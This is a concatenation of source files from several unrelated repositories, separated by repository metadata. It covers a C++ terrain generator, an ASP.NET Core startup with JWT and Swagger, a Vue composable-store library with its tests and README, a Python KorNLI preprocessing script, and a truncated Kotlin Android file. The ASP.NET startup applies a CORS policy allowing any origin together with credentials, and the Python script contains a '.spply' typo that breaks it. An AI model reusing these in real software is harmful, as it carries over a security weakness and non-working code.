float turbulence(float x, float y, int octaves, float lacunarity, float gain) {
float amp = 1;
sf::Vector2f vec(x, y);
float sum = 0;
for (int i = 0; i < octaves; i++) {
sum += std::abs(amp * raw_noise_2d(vec.x, vec.y));
amp *= gain;
vec *= lacunarity;
}
return sum / 2.0f;
}
void MapGenerator::generateMap(int* arr, int width, int height) {
float frequency = 15.0f;
for (int i = 0; i < width; i++) {
float nx = (float)i *0.15f + frequency;
float heightMap = RidgedMultifractal(nx / 4.0f, 1.0f, 8, 2.5f, 0.8f, 0.8f, 2.0f, 2.0f) / 2.0f;
for (int j = 0; j < height; j++) {
float yCoord = (float(j) / float(height))*4.0f;
float ny = (float)j * 0.15f + frequency;
if (heightMap >= yCoord) {
arr[i + j * width] = -1;
}
else {
float temp = noise(nx + 10.0f, ny + 10.0f);
float temp2 = noise(nx / 2.0f + 154.0f, ny / 2.0f + 884.0f);
//float temp2 = turbulence(nx / 20.0f + 154.0f, ny / 20.0f + 884.0f, 4, 2.5f, 0.4f);
if (temp2 <= 0.3f) {
arr[i + j * width] = -1;
}
else if (temp < 0.5) {
arr[i + j * width] = 0;
}
else {
arr[i + j * width] = 10;
}
}
}
}
}
<file_sep>#ifndef _INCLUDED_COLLIDABLEENTITY_H_
#define _INCLUDED_COLLIDABLEENTITY_H_
#include "Entity.h"
#include <SFML/Graphics/Shape.hpp>
#include <vector>
class CollidableEntity : public Entity {
public:
enum CollideCategory {
PLAYER,
PLAYER_PROJECTILE,
CURSOR,
ENEMY,
ENEMY_PROJECTILE,
WALL,
FLOOR,
IGNORE
};
CollidableEntity(EntityType entityType);
virtual ~CollidableEntity();
virtual CollideCategory getCategory() const = 0;
virtual std::vector<sf::Vector2f> getAxes() const = 0;
virtual void collide(CollidableEntity* collidable, const sf::Vector2f& moveAway) = 0;
virtual sf::FloatRect getHitbox() const = 0;
virtual sf::Shape* getNarrowHitbox() const = 0;
};
#endif // !_INCLUDED_COLLIDABLEENTITY_H_
|
d5925f26f97e9eb33163876388348b7c5aab5892
|
[
"C",
"C++"
] | 45 |
C++
|
TheBearmachine/Platformer
|
50a83aa8400f031aa722b115125740b18b5d4f57
|
b8707f9601a19a264e5912b0e27464c9c97c9954
|
refs/heads/master
|
<file_sep>using Chaos.Core.AuthHelper;
using Chaos.Core.Data;
using Microsoft.AspNetCore.Authentication.JwtBearer;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Mvc;
using Microsoft.EntityFrameworkCore;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.IdentityModel.Tokens;
using Swashbuckle.AspNetCore.Swagger;
using System;
using System.Collections.Generic;
using System.IdentityModel.Tokens.Jwt;
using System.IO;
using System.Reflection;
using System.Security.Claims;
using System.Text;
using System.Threading.Tasks;
namespace Chaos.Core
{
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
// This method gets called by the runtime. Use this method to add services to the container.
public void ConfigureServices(IServiceCollection services)
{
services.AddDbContext<ApplicationDbContext>(options =>
options.UseMySql(Configuration.GetConnectionString("DefaultConnection")));
services.AddMvc().SetCompatibilityVersion(CompatibilityVersion.Version_2_2);
#region JWT Token Service
//读取配置文件
var audienceConfig = Configuration.GetSection("Audience");
var symmetricKeyAsBase64 = audienceConfig["Secret"];
var keyByteArray = Encoding.ASCII.GetBytes(symmetricKeyAsBase64);
var signingKey = new SymmetricSecurityKey(keyByteArray);
// 令牌验证参数,之前我们都是写在AddJwtBearer里的,这里提出来了
var tokenValidationParameters = new TokenValidationParameters
{
ValidateIssuerSigningKey = true,//验证发行人的签名密钥
IssuerSigningKey = signingKey,
ValidateIssuer = true,//验证发行人
ValidIssuer = audienceConfig["Issuer"],//发行人
ValidateAudience = true,//验证订阅人
ValidAudience = audienceConfig["Audience"],//订阅人
ValidateLifetime = true,//验证生命周期
ClockSkew = TimeSpan.Zero,//这个是定义的过期的缓存时间
RequireExpirationTime = true
};
var signingCredentials = new SigningCredentials(signingKey, SecurityAlgorithms.HmacSha256);
//这个集合模拟用户权限表,可从数据库中查询出来
var permission = new List<Permission> {
new Permission { Url="/", Name="admin"},
new Permission { Url="/api/values", Name="admin"},
new Permission { Url="/", Name="system"},
new Permission { Url="/api/values1", Name="system"}
};
//如果第三个参数,是ClaimTypes.Role,上面集合的每个元素的Name为角色名称,如果ClaimTypes.Name,即上面集合的每个元素的Name为用户名
var permissionRequirement = new PermissionRequirement(
"/api/denied", permission,
ClaimTypes.Role,
audienceConfig["Issuer"],
audienceConfig["Audience"],
signingCredentials,
expiration: TimeSpan.FromSeconds(10)
);
// 配置授权服务,也就是具体的规则,已经对应的权限策略,比如公司不同权限的门禁卡
services.AddAuthorization(options =>
{
options.AddPolicy("Permission", policy => policy.Requirements.Add(permissionRequirement));
})
// 必需要配置认证服务,这里是jwtBearer默认认证,比如光有卡没用,得能识别他们
.AddAuthentication(options =>
{
options.DefaultAuthenticateScheme = JwtBearerDefaults.AuthenticationScheme;
options.DefaultChallengeScheme = JwtBearerDefaults.AuthenticationScheme;
})
// 针对JWT的配置,比如门禁是如何识别的,是放射卡,还是磁卡
.AddJwtBearer(o =>
{
//不使用https
o.RequireHttpsMetadata = false;
o.TokenValidationParameters = tokenValidationParameters;
o.Events = new JwtBearerEvents
{
OnTokenValidated = context =>
{
if (context.Request.Path.Value.ToString() == "/api/logout")
{
var token = ((context as TokenValidatedContext).SecurityToken as JwtSecurityToken).RawData;
}
return Task.CompletedTask;
}
};
});
//注入授权Handler
services.AddSingleton<IAuthorizationHandler, PermissionHandler>();
services.AddSingleton(permissionRequirement);
#endregion
#region Swagger
// Register the Swagger generator, defining 1 or more Swagger documents
services.AddSwaggerGen(c =>
{
c.SwaggerDoc("v1", new Info
{
Title = "Chaos API",
Version = "v1.0.0",
Description = "Chaos ASP.NET Core Web API",
TermsOfService = "None",
Contact = new Contact
{
Name = "<NAME>",
Email = string.Empty,
Url = "https://twitter.com/spboyer"
},
License = new License
{
Name = "Use under LICX",
Url = "https://example.com/license"
}
});
// Set the comments path for the Swagger JSON and UI.
var xmlFile = $"{Assembly.GetExecutingAssembly().GetName().Name}.xml";
var xmlPath = Path.Combine(AppContext.BaseDirectory, xmlFile);
c.IncludeXmlComments(xmlPath, true);
#region Token绑定到ConfigureServices
//添加header验证信息
//c.OperationFilter<SwaggerHeader>();
var security = new Dictionary<string, IEnumerable<string>> { { "Chaos.Core", new string[] { } }, };
c.AddSecurityRequirement(security);
//方案名称“Blog.Core”可自定义,上下一致即可
c.AddSecurityDefinition("Chaos.Core", new ApiKeyScheme
{
Description = "JWT授权(数据将在请求头中进行传输) 直接在下框中输入Bearer {token}(注意两者之间是一个空格)",
Name = "Authorization",//jwt默认的参数名称
In = "header",//jwt默认存放Authorization信息的位置(请求头中)
Type = "apiKey"
});
#endregion
});
#endregion
#region CORS
//声明策略,记得下边app中配置
services.AddCors(c =>
{
// 全开放
c.AddPolicy("AllRequests", policy =>
{
policy
.AllowAnyOrigin()//允许任何源
.AllowAnyMethod()//允许任何方式
.AllowAnyHeader()//允许任何头
.AllowCredentials();//允许cookie
});
//一般采用这种方法
c.AddPolicy("LimitRequests", policy =>
{
policy
.WithOrigins("http://127.0.0.1:1818", "http://localhost:8080", "http://localhost:8021", "http://localhost:8081", "http://localhost:1818")//支持多个域名端口,注意端口号后不要带/斜杆:比如localhost:8000/,是错的
.AllowAnyHeader()//Ensures that the policy allows any header.
.AllowAnyMethod();
});
});
#endregion
}
// This method gets called by the runtime. Use this method to configure the HTTP request pipeline.
public void Configure(IApplicationBuilder app, IHostingEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
// The default HSTS value is 30 days. You may want to change this for production scenarios, see https://aka.ms/aspnetcore-hsts.
app.UseHsts();
}
#region CORS
app.UseCors("AllRequests");
#endregion
app.UseHttpsRedirection();
#region Swagger
// Enable middleware to serve generated Swagger as a JSON endpoint.
app.UseSwagger();
// Enable middleware to serve swagger-ui (HTML, JS, CSS, etc.),
// specifying the Swagger JSON endpoint.
app.UseSwaggerUI(c =>
{
c.SwaggerEndpoint("/swagger/v1/swagger.json", "Chaos API V1.0.0");
c.RoutePrefix = string.Empty;
});
#endregion
app.UseMvc();
}
}
}
|
cd987cdb09ae906fae97f0d6f3063d0d878b9233
|
[
"C#"
] | 1 |
C#
|
rocrukh/Chaos.Core
|
21153f4ee3fe3d7e48743bdb39e9adfebda197bd
|
b7038425cfea00e98f09002226acc9ff130b064a
|
refs/heads/master
|
<file_sep># Changelog
All notable changes to this project will be documented in this file. See [standard-version](https://github.com/conventional-changelog/standard-version) for commit guidelines.
### [0.1.3](https://github.com/samzlab/vue-composable-store/compare/v0.1.2...v0.1.3) (2020-10-06)
### Bug Fixes
* return types from useStore() and context.use() ([2c2f34d](https://github.com/samzlab/vue-composable-store/commit/2c2f34dd04430310f36b60bebf2afca76a25eed4))
### [0.1.2](https://github.com/samzlab/vue-composable-store/compare/v0.1.1...v0.1.2) (2020-10-06)
### Features
* **plugins:** more tests and validations, full coverage ([65f4140](https://github.com/samzlab/vue-composable-store/commit/65f414007b9257580d924b021fca95feed5f97b6))
* **plugins:** plugin hooks (onInitialized, onUse, onAction, onMutate) [#1](https://github.com/samzlab/vue-composable-store/issues/1) ([750df52](https://github.com/samzlab/vue-composable-store/commit/750df5207115fa210fb2d7596e856de8619d0413))
* **plugins:** VueStorePlugin init moved to the install callback and now accept options ([f194e3d](https://github.com/samzlab/vue-composable-store/commit/f194e3db2dd452755fdcb5c02aeb2a03079ac996))
### Bug Fixes
* do not export store symbol ([dd52738](https://github.com/samzlab/vue-composable-store/commit/dd527388f4fdc27e850d0448f798708a9452f049))
### 0.1.1 (2020-10-04)
### Features
* initial release ([de4deee](https://github.com/samzlab/vue-composable-store/commit/de4deee131e842c8c561b98913a95f6654fe8468))
<file_sep>[](https://www.npmjs.com/package/vue-composable-store)  [](https://conventionalcommits.org) [](https://github.com/samzlab/tailwind-hsluv/blob/master/LICENSE) [](https://travis-ci.org/samzlab/vue-composable-store)
# Vue composable store
The original idea was [spoilered in a video](https://www.youtube.com/watch?v=ajGglyQQD0k) about Vuex 5 draft by the maker (<NAME>). I never liked the current syntax, but this new API made me to want to use it ASAP. So I started to implement it, for fun and for internal use in some hobby project.
> It's not supposed to be a replacement of Vuex. It's just a fun project for me.
Currently its pretty lightweight: **1.23 KB minified** (619 byte Gzipped) - *with stripped asserts*
It's supports plugins, app-scoped stores and TypeScript.
> **Do NOT use it in production** environment. It's under continuous refactor, and as soon as Vuex 5 released it's will be useless anyway.
## Peer dependencies
* Vue 3.0 or higher
## Installation
```
npm i vue-composable-store
```
> **NOTE:** There is a "hidden" production build in the dist folder which is ~30% smaller due to stripped asserts.
>
> ```js
> import { createVueStore } from 'vue-composable-store/dist/index-prod-es.js';
> ```
## Usage
> **The Options API not supported!**
# defineStore() - the way you define your store
```js
import { readonly, reactive, ref, computed } from 'vue';
import { defineStore } from 'vue-store';
export default defineStore('shop', () => {
// state
const list = reactive([]);
const page = ref(1);
const limit = ref(20);
// actions
const hasNext = computed(() => {
return list.length === limit;
});
async function load(page) {
// ...fetch data into `list`...
page.value = page;
}
// final store object
return {
hasNext,
list: readonly(list), // <---- in case you do not want it to be modifiable from outside
page,
load
};
});
```
## Compose stores (replacement for store modules)
```js
import { readonly, reactive } from 'vue';
import { defineStore, useStore } from 'vue-store';
// imported just in the store/compont which composing,
// so it's can be properly code-splitted/tree-shaken, etc
import cartStore from './stores/cart';
export default defineStore('shop', () => {
// state
const products = reactive([]);
async function load(page) {
// ...fetch data into `list`...
page.value = page;
}
// final store object
return {
cart: useStore(cartStore), // <--- store composition instead of store modules
products,
load
};
});
```
```js
import { defineComponent } from 'vue';
import { useStore } from 'vue-composable-store';
import productsStore from './stores/products';
export default defineComponent({
name: 'ProductList',
setup() {
// the store lazy initialized on the first use
const { load, list, hasNext } = useStore(productsStore);
load(1);
return {
list,
hexNext
};
}
});
```
## createStore() - how you connect it to your app
```js
import { createApp } from 'vue';
import { createVueStore } from 'vue-composable-store';
import App from './App.vue';
const store = createVueStore();
const app = createApp(App);
app.use(store);
app.mount('#el');
```
# Plugins
Plugins can provide utility function or data object to be exposed in the `storeContext`.
```js
// api-plugin.js
export default (provide) => {
provide('api', (uri) => fetch(`https://localhost:5000/${uri}`));
}
// app.js
import { createApp } from 'vue';
import { createVueStore } from 'vue-composable-store';
import apiPlugin from './api-plugin.js';
import App from './App.vue';
const options = { plugins: [ apiPlugin ] };
const vueStore = createVueStore(options);
const app = createApp(App);
app.use(vueStore);
// optionally you can pass the `options` at the app.use() too
// in this case the plugin list will be overridden
// app.use(vueStore, options)
// my-store.js
export default defineStore(('my-store', ({ api }) => { // <-- `api` in the context
// you can use your api() plugin here...
return {};
}));
```
### Hooks
The usable hooks are passed in the second argument of the plugin.
```js
// my-plugin.js
export default function myPlugin(provide, hooks) => { /* plugin code */};
```
The first two arguments passed to the callback functions are always:
* The `name` of the store which triggered the callback
* The `storeInstance` contains the exact object which is returned from the initializer function passed to `defineStore()`.
`onUse(callback: (storeName, storeInstance, context) => void)`
Called every time a store is being accessed by the `useStore()` or composed via `use()`.
The `context` is the same as in the `defineStore` , you can use it to access or detect other plugins
**Example:**
```js
// my-store-logger.js
export default function logger(provide, { onUse }) {
onUse((name, instance, context) => {
console.log(`Used: "${name}"`);
});
}
```
`onInitialized(callback: (storeName, storeInstance, context) => void)`
Called once per store per app after the first time usage of `useStore()` or composed via `use()`
```js
// my-store-logger.js
export default function logger(provide, { onInitialized }) {
onInitialized((name, instance, context) => {
console.log(`[Initialized] Store name: "${name}"`);
});
}
```
`onAction(callback: (storeName, storeInstance, actionName, actionArgs, actionResult, context) => void)`
Called after a store function invoked.
```js
// my-store-logger.js
export default function logger(provide, { onAction }) {
onAction((name, instance, action, actionArgs, actionResult, context) => {
console.log(`[Action invoked] Store action: "${name}.${action}"`);
console.log(` args: ${actionArgs.map(JSON.stringify).join(', ')}`)
console.log(` return value: ${JSON.stingify(actionResult)}`);
});
}
```
`onMutated(callback: (storeName, storeInstance, stateKey, value, oldValue, context) => void)`
Called when any watchable store property mutated (the value changed).
```js
// my-store-logger.js
export default function logger(provide, { onMutated }) {
onMutated((name, instance, key, newValue, oldValue, context) => {
const oldJSON = JSON.encode(oldValue);
const newJSON = JSON.encode(newValue);
console.log(`[State mutated] "${name}.${key}" is being mutated from ${oldJSON} to ${newJSON}`);
});
}
```
## Changelog
See the [CHANGELOG.md](./CHANGELOG.md)
## License
Copyright © 2020 <NAME>
Licensed under the [MIT License](https://github.com/samzlab/tailwind-hsluv/blob/master/LICENSE).<file_sep>import { inject, Plugin, isReactive, isRef, watch } from 'vue';
function assert(valid: boolean, error: string): void {
if (!valid) { throw new Error(error); }
}
const
VueStoreSymbol = Symbol(),
// utils, shortcuts
isFunction = (val: unknown): boolean => typeof val === 'function',
isUndef = (val: unknown): boolean => typeof val === 'undefined';
export type StoreInstance = {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
[key: string]: any
}
export interface StoreDefinition<T> {
name: string,
// eslint-disable-next-line no-use-before-define
setup: StoreSetupFunction<T>
}
export interface StoreContext {
[pluginName: string]: unknown
}
export interface StoreSetupFunction<T extends StoreInstance> {
(context: StoreContext): T
}
export type OnUseCallback = (storeName: string, storeInstance: StoreInstance, context: StoreContext) => void;
export type OnActionCallback = (storeName: string, storeInstance: StoreInstance, actionName: string, args: unknown[], result: unknown, context: StoreContext) => void;
export type OnMutateCallback = (storeName: string, storeInstance: StoreInstance, stateKey: string, value: unknown, oldValue: unknown, context: StoreContext) => void;
export type StorePluginHooks = {
onInitialized: (callback: OnUseCallback) => void,
onUse: (callback: OnUseCallback) => void,
onAction: (callback: OnActionCallback) => void,
onMutate: (callback: OnMutateCallback) => void
};
export type StorePluginProvider = (pluginName: string, dataOrFunction: unknown) => void;
export type StorePlugin = (provide: StorePluginProvider, hooks: StorePluginHooks) => void;
export interface StoreOptions {
plugins?: StorePlugin[]
}
export type VueStoreInstance = {
stores: { [name: string]: StoreInstance },
context: StoreContext,
listeners: {
use: OnUseCallback[]
init: OnUseCallback[]
action: OnActionCallback[],
mutate: OnMutateCallback[]
}
};
function validateStoreDefinition<T>({ name = '', setup = null }: StoreDefinition<T>, fnName: string): void {
assert(typeof name === 'string' && name.length > 0 && isFunction(setup), `${fnName}: invalid store definition`);
}
export function defineStore<T extends StoreInstance>(name: string, setup: StoreSetupFunction<T>): StoreDefinition<T> {
const def = { name, setup };
validateStoreDefinition(def, 'defineStore');
return def;
}
// eslint-disable-next-line @typescript-eslint/ban-types
function callListeners(listeners: Function[], ...params): void {
for (let i = 0, len = listeners.length; i < len; i++) {
listeners[i](...params);
}
}
type arrowFn = (...args) => never;
// eslint-disable-next-line @typescript-eslint/ban-types
const wrapAction = <T extends arrowFn>(fn: T, listeners: Function[], name: string, store: StoreInstance, key: string, context: StoreContext) => {
return (...args: Parameters<T>): ReturnType<T> => {
const result = fn(...args);
callListeners(listeners, name, store, key, args, result, context);
return result;
};
};
function registerStore<T>(instance: VueStoreInstance, { name, setup }: StoreDefinition<T>): T {
const { stores, context, listeners } = instance;
let hook = 'use';
if (isUndef(stores[name])) {
const store = setup(context);
const hasActionListeners = listeners.action.length > 0;
const hasMutateListeners = listeners.mutate.length > 0;
hook = 'init';
for (const key in store) {
if (hasActionListeners && isFunction(store[key])) {
store[key as string] = wrapAction(store[key as string], listeners.action, name, store, key, context);
}
if (hasMutateListeners && (isReactive(store[key]) || isRef(store[key]))) {
watch(store[key as string], (value, oldValue) => {
callListeners(listeners.mutate, name, stores[name], key, value, oldValue, context);
});
}
}
stores[name] = store;
}
callListeners(listeners[hook], name, stores[name], context);
return stores[name] as T;
}
export function useStore<T>(storeDefinition: StoreDefinition<T>): T {
validateStoreDefinition(storeDefinition, 'useStore');
return registerStore(inject(VueStoreSymbol) as VueStoreInstance, storeDefinition);
}
export function createVueStore(options1: StoreOptions = {}): Plugin {
const install = (app, options2: StoreOptions = {}): void => {
const { plugins } = { plugins: [], ...options1, ...options2 } as StoreOptions;
const
use: OnUseCallback[] = [],
init: OnUseCallback[] = [],
action: OnActionCallback[] = [],
mutate: OnMutateCallback[] = [];
const instance: VueStoreInstance = {
stores: {},
context: {},
listeners: { use, init, action, mutate }
};
assert(plugins instanceof Array, 'VueStore plugins must be an array');
if (plugins.length) {
const addToContext: StorePluginProvider = (pluginName: string, data: unknown): void => {
assert(typeof pluginName === 'string' && pluginName.trim().length > 0, `VueStorePlugin names must be a valid string. Invalid name: ${JSON.stringify(pluginName)}`);
assert(isUndef(instance.context[pluginName]), `VueStorePlugin names must be unique. Duplicate name: "${pluginName}"`);
assert(!isUndef(data), `VueStorePlugin (${pluginName}) does not provided anything`);
instance.context[pluginName] = data;
};
const hooks: StorePluginHooks = {
onInitialized: init.push.bind(init),
onUse: use.push.bind(use),
onAction: action.push.bind(action),
onMutate: mutate.push.bind(mutate)
};
for (let i = 0, len = plugins.length; i < len; i++) {
assert(isFunction(plugins[i]), `VueStorePlugin must be a function (instead of \`${typeof plugins[i]}\`)`);
plugins[i](addToContext, hooks);
}
}
app.provide(VueStoreSymbol, instance);
};
return {
install
};
}<file_sep># TODO
* [ ] eslint-typescript rules check
* [ ] example projects
* [ ] example shop
* [ ] plugins implementations
* [ ] Persist (localStorage)
* [ ] hydrate from SSR app
* [ ]
<file_sep>import { createVueStore, defineStore, StorePlugin, useStore } from '../src/';
import { computed, createApp, nextTick, ref } from 'vue';
function createHost() {
return document.createElement('div');
}
const body = document.body;
const hosts = { one: null, two: null };
body.appendChild(hosts.one = document.createElement('div'));
body.appendChild(hosts.two = document.createElement('div'));
const myStoreSetup = jest.fn(() => {
const count = ref(0);
function increment() {
count.value++;
}
return {
count,
increment
};
});
const myStore = defineStore('myStore', myStoreSetup);
describe('Plugin validations', () => {
function buildApp(plugins1, plugins2 = {}) {
return createApp(document.createElement('div')).use(createVueStore(plugins1), plugins2);
}
test('Should throw on invalid plugins option (string)', () => {
expect(() => buildApp({ plugins: 'meh' })).toThrow('VueStore plugins must be an array');
});
test('Should throw on invalid plugin (string)', () => {
expect(() => buildApp({ plugins: [ 'meh' ] })).toThrow('VueStorePlugin must be a function (instead of `string`)');
});
test('Should throw on invalid provided name/value', () => {
const plugin = (provide) => provide();
const plugin2 = (provide) => provide(' ');
const plugin3 = (provide) => provide('kek');
expect(() => buildApp({ plugins: [ plugin ] })).toThrow('VueStorePlugin names must be a valid string. Invalid name: undefined');
expect(() => buildApp({}, { plugins: [ plugin ] })).toThrow('VueStorePlugin names must be a valid string. Invalid name: undefined');
expect(() => buildApp({ plugins: [ plugin2 ] })).toThrow('VueStorePlugin names must be a valid string. Invalid name: " "');
expect(() => buildApp({ plugins: [ plugin3 ] })).toThrow('VueStorePlugin (kek) does not provided anything');
});
});
describe('Basic store functionality', () => {
let exposedStore;
const app = createApp({
render(ctx) {
return `count: ${ctx.count}`;
},
setup() {
exposedStore = useStore(myStore);
return {
count: exposedStore.count
};
}
});
const vueStore = createVueStore();
const installer = jest.fn(vueStore.install);
app.use(installer);
test('created store should have installed', () => {
expect(installer).toBeCalled();
});
test('defined store should be initialized after useStore', () => {
app.mount(hosts.one);
expect(myStoreSetup).toBeCalled();
});
test('store value should be visible in component', async() => {
await nextTick();
expect(hosts.one.textContent).toEqual('count: 0');
});
test('mutated store value should be updated in the component', async() => {
exposedStore.increment();
await nextTick();
expect(hosts.one.textContent).toEqual('count: 1');
});
});
describe('Validations', () => {
test('should throw on invalid store definition in useStore()', () => {
// @ts-expect-error testing
expect(() => useStore({})).toThrow('useStore: invalid store definition');
});
test('should throw on invalid store definition in defineStore()', () => {
// @ts-expect-error testing
expect(() => defineStore()).toThrow('defineStore: invalid store definition');
// @ts-expect-error testing
expect(() => defineStore(false)).toThrow('defineStore: invalid store definition');
// @ts-expect-error testing
expect(() => defineStore(false, null)).toThrow('defineStore: invalid store definition');
});
});
describe('Store composition and multi-app, plugins', () => {
const composedStore = defineStore('composed', ({ prefix }) => {
const { count } = useStore(myStore);
// @ts-expect-error can't type plugins... yet :/
const plusOne = computed(() => `${prefix()} ${count.value + 1}`);
return {
plusOne
};
});
const plugin = jest.fn((provide) => {
provide('prefix', () => '+ 1 =');
});
let exposedStore;
createApp({
render(ctx) {
return `count: ${ctx.count} ${ctx.plusOne}`;
},
setup() {
const { count } = exposedStore = useStore(myStore);
const { plusOne } = useStore(composedStore);
return {
count,
plusOne
};
}
}).use(createVueStore({
plugins: [ plugin ]
})).mount(hosts.two);
test('plugin should be added', () => {
expect(plugin).toBeCalled();
});
test('should initialize the store in the new app context', () => {
expect(exposedStore).toHaveProperty([ 'count', 'value' ], 0);
});
// ALL-IN :D
test('composed store values should be visible in the component', async() => {
await nextTick();
expect(hosts.two.textContent).toEqual('count: 0 + 1 = 1');
});
test('mutated store should trigger updates in the composed store', async() => {
exposedStore.increment();
await nextTick();
expect(hosts.two.textContent).toEqual('count: 1 + 1 = 2');
});
test('common store should be initialized two times (for each app)', () => {
expect(myStoreSetup).toBeCalledTimes(2);
});
});
describe('plugin system', () => {
/* eslint-disable @typescript-eslint/no-unused-vars, no-void */
const onInitCallback = jest.fn((name, instance, context) => { return void 0; });
const onUseCallback = jest.fn((name, instance, context) => { return void 0; });
const onActionCallback = jest.fn((name, instance, action, args, result, context) => { return void 0; });
const onMutateCallback = jest.fn((name, instance, key, value, old, context) => { return void 0; });
const mockedAction = jest.fn((a: string, b: string, c: number) => { return 'd'; });
/* eslint-enable @typescript-eslint/no-unused-vars */
const plugin: StorePlugin = (provide, { onInitialized, onUse, onAction, onMutate }) => {
onInitialized(onInitCallback);
onUse(onUseCallback);
onAction(onActionCallback);
onMutate(onMutateCallback);
};
const testStore = defineStore('test', () => {
return {
status: ref(null),
moo: mockedAction
};
});
const compoundStore = defineStore('compound', () => {
const test = useStore(testStore);
test.status.value = 'success';
test.moo('a', 'b', 1);
return {};
});
const app = createApp({
setup() {
useStore(testStore); // <-- "test" onInit.
useStore(compoundStore); // <-- "compound" onInit. (+"test" onUse)
return () => '';
}
}).use(createVueStore({
plugins: [ plugin ]
}));
app.mount(createHost());
test('should call onInitialize on useStore()', () => {
expect(onInitCallback).toBeCalledWith('test', expect.anything(), expect.anything());
});
test('should not call onInitialize twice for the same store', () => {
expect(onInitCallback).toBeCalledWith('compound', expect.anything(), expect.anything());
expect(onInitCallback).toBeCalledTimes(2);
});
test('should call onUse when reused', () => {
expect(onUseCallback).toBeCalledTimes(1);
});
test('should call onAction when a store function invoked', () => {
expect(onActionCallback).toBeCalledWith('test', expect.anything(), 'moo', [ 'a', 'b', 1 ], 'd', expect.anything());
});
test('should call onMutate only once when a store property mutated', () => {
expect(onMutateCallback).toBeCalledWith('test', expect.anything(), 'status', 'success', null, expect.anything());
expect(onMutateCallback).toBeCalledTimes(1);
});
});
|
93078bace8d1a7f063dba72ca2f78ec44a8135a5
|
[
"Markdown",
"TypeScript"
] | 5 |
Markdown
|
samzlab/vue-composable-store
|
95adf26fc3f79b3530bf9e11937f8d4eb99bb6bd
|
843fd83125a923a0846d0d76a411574796150c9e
|
refs/heads/main
|
<repo_name>silverstar0727/KorNLI_byBERT<file_sep>/preprocess.py
import os
import tensorflow as tf
from transformers import BertTokenizer, TFBertModel
import numpy as np
import pandas as pd
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
#random seed 고정
tf.random.set_seed(1234)
np.random.seed(1234)
# BASE PARAMS
BATCH_SIZE = 32
NUM_EPOCHS = 3
MAX_LEN = 24 * 2 # Average total * 2 -> EDA에서 탐색한 결과
DATA_IN_PATH = './data_in/KOR'
DATA_OUT_PATH = "./data_out/KOR"
# 학습데이터
TRAIN_SNLI_DF = os.path.join(DATA_IN_PATH, 'KorNLI', 'snli_1.0_train.kor.tsv')
TRAIN_XNLI_DF = os.path.join(DATA_IN_PATH, 'KorNLI', 'multinli.train.ko.tsv')
train_data_snli = pd.read_csv(TRAIN_SNLI_DF, header=0, delimiter = '\t', quoting = 3)
train_data_xnli = pd.read_csv(TRAIN_XNLI_DF, header=0, delimiter = '\t', quoting = 3)
train_data_snli_xnli = train_data_snli.append(train_data_xnli) # 두개의 train data를 하나로 병함
train_data_snli_xnli = train_data_snli_xnli.dropna() # 결측치 제거
train_data_snli_xnli = train_data_snli_xnli.reset_index() # 인덱스 reset
# 검증데이터
DEV_XNLI_DF = os.path.join(DATA_IN_PATH, 'KorNLI', 'xnli.dev.ko.tsv')
dev_data_xnli = pd.read_csv(DEV_XNLI_DF, header=0, delimiter = '\t', quoting = 3)
dev_data_xnli = dev_data_xnli.dropna() # 결측치 제거
# transformers의 BertTokenizer를 이용
tokenizer = BertTokenizer.from_pretrained("bert-base-multilingual-cased",
cache_dir='bert_ckpt',
do_lower_case=False)
# 2개의 문장을 받아서 전처리할 수 있는 bert_tokenizer_v2 함수를 만들어 줌
def bert_tokenizer_v2(sent1, sent2, MAX_LEN):
encoded_dict = tokenizer.encode_plus(
text = sent1,
text_pair = sent2,
add_special_tokens = True,
max_length = MAX_LEN,
pad_to_max_length = True,
return_attention_mask = True)
input_id = encoded_dict['input_ids']
attention_mask = encoded_dict['attention_mask']
token_type_id = encoded_dict['token_type_ids']
return input_id, attention_mask, token_type_id
# bert_tokenizer_v2의 아웃풋을 담을 수 있는 리스트를 지정
input_ids = []
attention_masks = []
token_type_ids = []
# 한 문장씩 꺼내어 bert_tokenizer_v2의 전처리 후 저장
for sent1, sent2 in zip(dev_data_xnli['sentence1'], dev_data_xnli['sentence2']):
try:
input_id, attention_mask, token_type_id = bert_tokenizer_v2(sent1, sent2, MAX_LEN)
input_ids.append(input_id)
attention_masks.append(attention_mask)
token_type_ids.append(token_type_id)
except Exception as e:
pass
# label 값을 entailment, contradiction, neutral에서 0,1,2의 정수형으로 변경
label_dict = {'entailment': 0, 'contradiction': 1, 'neutral': 2}
def convert_int(label):
num_label = label_dict[label]
return num_label
train_data_snli_xnli['gole_label_int'] = train_data_snli_xnli['gold_label'].spply(convert_int)
train_data_labels = np.array(train_data_snli_xnli['gole_label_int'], dtype = int)
dev_data_xnli['gold_label_int'] = dev_data_xnli['gold_label'].apply(convert_int)
dev_data_labels = np.array(dev_data_xnli['gold_label_int'], dtype = int)
print("# train labels: {}, #dev labels: {}".format(len(train_data_labels), len(dev_data_labels)))
|
a7692656ea0f9ab51530efaf6dc2f6862aa8e95d
|
[
"Python"
] | 1 |
Python
|
silverstar0727/KorNLI_byBERT
|
6a2f566f09e2ad6035858a844f9a12b202fdfd82
|
e0aa290c21ce0c2860cdcd3227cf7fbec451dc95
|
refs/heads/master
|
<file_sep>package com.example.greenthumb_test
data class User(val user_id:Int, val email_id:String?, val user_type:Int)<file_sep>package com.example.greenthumb_test
import android.content.IntentFilter
import android.net.ConnectivityManager
import android.os.Bundle
import android.view.View
import android.widget.ProgressBar
import androidx.appcompat.app.AppCompatActivity
import com.google.android.material.snackbar.Snackbar
open class BaseActivity : AppCompatActivity(),ConnectivityReceiver.ConnectivityReceiverListener {
private var mSnackBar: Snackbar? = null
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
registerReceiver(ConnectivityReceiver(),
IntentFilter(ConnectivityManager.CONNECTIVITY_ACTION)
)
}
private fun showMessage(isConnected: Boolean) {
if (!isConnected) {
mSnackBar = Snackbar.make(findViewById(R.id.rootLayout), "You are offline now.", Snackbar.LENGTH_LONG)
mSnackBar?.show()
} else {
